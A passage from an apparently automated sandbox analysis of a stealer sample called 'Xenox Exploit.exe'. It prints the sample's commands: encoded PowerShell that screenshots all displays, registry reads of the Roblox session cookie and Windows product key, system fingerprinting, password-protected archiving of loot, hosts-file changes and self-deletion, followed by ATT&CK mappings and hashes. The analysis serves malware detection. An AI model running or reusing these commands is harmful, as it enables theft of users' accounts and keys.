JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3568
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o3pslupa\o3pslupa.cmdline"
        5⤵
        
        PID:1620
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES633E.tmp" "c:\Users\Admin\AppData\Local\Temp\o3pslupa\CSC40CBE5649C4E4768AB32B18A27AB5E0.TMP"
        6⤵
        
        PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4676
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1928
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3744
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1168
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2432
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3164
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2880
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3332
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3992
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2576
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1656
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23042\rar.exe a -r -hp"kaneki" "C:\Users\Admin\AppData\Local\Temp\ErwQb.zip" *"
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\_MEI23042\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI23042\rar.exe a -r -hp"kaneki" "C:\Users\Admin\AppData\Local\Temp\ErwQb.zip" *
      4⤵
      Executes dropped EXE
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4608
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
74bf855916176390b8186c8fc238a26f

SHA1
79b3ae04c22ed44b379c2790df1e5d6ddcd64d4d

SHA256
af4de2ff83e36e452f40fe0af0775e7cbc6c6253eaceacbbc1396039f2c3ba23

SHA512
a6b0ad9c419f677a73e6643f21e33126b04f7a76857ee5e1bf7e6158fd73bbdff9551a48bf98907ac279bd18e59e5ca62e497ee8f22895b59c98bfccbaf9bc75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
85126fecd99d5e706b3bd70a6bf405f7

SHA1
51959e9fe1aa2b6f7d1d236381905599b21935ae

SHA256
d508ecbd862439161fa14dac8c75f5f9ad9284ccf51c1fb90f906e638dfeb71e

SHA512
80fe1837a000132b67670822ceac810b6e3c9dde4280d66f77594deadbc60ed690119dc0eb9146ce4c35e304e3273c6b1e94c2dc50b0186c1cdaf601f88d8160

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d0a37852e151f6c572aa0b32a44fa547

SHA1
eabacfc28a3e448ee9697750b61021c66fe11ad5

SHA256
4d4df197e27feed6e0a1fcc69742bcbbdc8f258cdc14d67d5a801f5fea54a4bf

SHA512
b5a56e7d3c21e89b5e428b91990f290a39f92260c510d4606ae1818cdc31b2077afe0f17517b884faf525f6383d1e0d75dfefeff223b7013297be3c7090c611b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES633E.tmp

Filesize
1KB

MD5
44acb5e4f415d6a6ec7168cb8f9e1c23

SHA1
682e6d156a8a771a97e729d2dae6ba5b2b2a503d

SHA256
f1bff7b09f6fb4d693175dfcfff4101f1c8274ac1ed9abd86b58c3d060fd4ba9

SHA512
bfd553ac86c8265df9f9e84e5fbb15271e907ebe06c2a265f77b4d6f3fb24425bf26bab96e32aa9db235249a21c50d1e51ea64bc2acfbbbc97fa7dc8f97f6fd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_bz2.pyd

Filesize
48KB

MD5
5cd942486b252213763679f99c920260

SHA1
abd370aa56b0991e4bfee065c5f34b041d494c68

SHA256
88087fef2cff82a3d2d2d28a75663618271803017ea8a6fcb046a23e6cbb6ac8

SHA512
6cd703e93ebccb0fd896d3c06ca50f8cc2e782b6cc6a7bdd12786fcfb174c2933d39ab7d8e674119faeca5903a0bfac40beffb4e3f6ca1204aaffefe1f30642c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_ctypes.pyd

Filesize
59KB

MD5
4878ad72e9fbf87a1b476999ee06341e

SHA1
9e25424d9f0681398326252f2ae0be55f17e3540

SHA256
d699e09727eefe5643e0fdf4be4600a1d021af25d8a02906ebf98c2104d3735d

SHA512
6d465ae4a222456181441d974a5bb74d8534a39d20dca6c55825ebb0aa678e2ea0d6a6853bfa0888a7fd6be36f70181f367a0d584fccaa8daa940859578ab2b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_decimal.pyd

Filesize
107KB

MD5
d60e08c4bf3be928473139fa6dcb3354

SHA1
e819b15b95c932d30dafd7aa4e48c2eea5eb5fcb

SHA256
e21b0a031d399ffb7d71c00a840255d436887cb761af918f5501c10142987b7b

SHA512
6cac905f58c1f25cb91ea0a307cc740575bf64557f3cd57f10ad7251865ddb88965b2ad0777089b77fc27c6d9eb9a1f87456ddf57b7d2d717664c07af49e7b58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_hashlib.pyd

Filesize
35KB

MD5
edfb41ad93bc40757a0f0e8fdf1d0d6c

SHA1
155f574eef1c89fd038b544778970a30c8ab25ad

SHA256
09a0be93d58ce30fa7fb8503e9d0f83b10d985f821ce8a9659fd0bbc5156d81e

SHA512
3ba7d225828b37a141ed2232e892dad389147ca4941a1a85057f04c0ed6c0eab47b427bd749c565863f2d6f3a11f3eb34b6ee93506dee92ec56d7854e3392b10

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_lzma.pyd

Filesize
86KB

MD5
25b96925b6b4ea5dd01f843ecf224c26

SHA1
69ba7c4c73c45124123a07018fa62f6f86948e81

SHA256
2fbc631716ffd1fd8fd3c951a1bd9ba00cc11834e856621e682799ba2ab430fd

SHA512
97c56ce5040fb7d5785a4245ffe08817b02926da77c79e7e665a4cfa750afdcb7d93a88104831944b1fe3262c0014970ca50a332b51030eb602bb7fb29b56ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_queue.pyd

Filesize
26KB

MD5
c2ba2b78e35b0ab037b5f969549e26ac

SHA1
cb222117dda9d9b711834459e52c75d1b86cbb6e

SHA256
d8b60222732bdcedddbf026f96bddda028c54f6ae6b71f169a4d0c35bc911846

SHA512
da2bf31eb6fc87a606cbaa53148407e9368a6c3324648cb3df026a4fe06201bbaab1b0e1a6735d1f1d3b90ea66f5a38d47daac9686520127e993ecb02714181f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_socket.pyd

Filesize
44KB

MD5
aa8435614d30cee187af268f8b5d394b

SHA1
6e218f3ad8ac48a1dde6b3c46ff463659a22a44e

SHA256
5427daade880df81169245ea2d2cc68355d34dbe907bc8c067975f805d062047

SHA512
3ccf7ec281c1dc68f782a39f339e191a251c9a92f6dc2df8df865e1d7796cf32b004ea8a2de96fe75fa668638341786eb515bac813f59a0d454fc91206fee632

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_sqlite3.pyd

Filesize
57KB

MD5
81a43e60fc9e56f86800d8bb920dbe58

SHA1
0dc3ffa0ccbc0d8be7c7cbae946257548578f181

SHA256
79977cbda8d6b54868d9cfc50159a2970f9b3b0f8df0ada299c3c1ecfdc6deb0

SHA512
d3a773f941f1a726826d70db4235f4339036ee5e67667a6c63631ff6357b69ba90b03f44fd0665210ee243c1af733c84d2694a1703ebb290f45a7e4b1fc001c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\_ssl.pyd

Filesize
66KB

MD5
c0512ca159b58473feadc60d3bd85654

SHA1
ac30797e7c71dea5101c0db1ac47d59a4bf08756

SHA256
66a0e06cce76b1e332278f84eda4c032b4befbd6710c7c7eb6f5e872a7b83f43

SHA512
